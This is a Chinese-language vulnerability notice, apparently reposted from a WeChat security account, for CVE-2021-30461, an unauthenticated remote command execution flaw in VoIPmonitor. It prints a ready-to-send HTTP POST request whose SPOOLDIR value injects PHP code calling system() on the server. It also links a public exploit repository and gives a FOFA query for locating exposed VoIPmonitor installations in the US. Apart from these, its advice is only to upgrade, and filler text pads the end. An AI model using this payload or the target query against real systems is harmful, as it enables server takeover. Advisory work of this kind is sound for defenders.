影响范围
VoIPmonitor < 24.60
漏洞类型
远程命令执行
利用条件
影响范围应用
漏洞概述
VoIPmonitor是一款具备商业前端的凯瑞网络数据包嗅探器,近期有安全研究人员披露VoIPmonitor存在远程命令执行漏洞,攻击者可以利用该漏洞获取服务器端的Shell权限并执行系统命令
漏洞复现
登录认证界面:
发送以下请求:
POST /index.php HTTP/1.1
Host: x.x.x.x
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://x.x.x.x
Referer: http://x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=be161dbht8u49u526t6li3tg05
Connection: close
SPOOLDIR=test%22.system%28id%29.%22
EXP测试
之后访问shell:
漏洞EXP
https://github.com/Al1ex/CVE-2021-30461
目标检索
FOFA:
title="VoIPmonitor" && country="US"
安全建议
升级到最新版本~
参考链接
https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
-----------------------------------------------------------------------
凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字
原文始发于微信公众号(七芒星实验室):CVE-2021-30461:VoIPmonitor RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论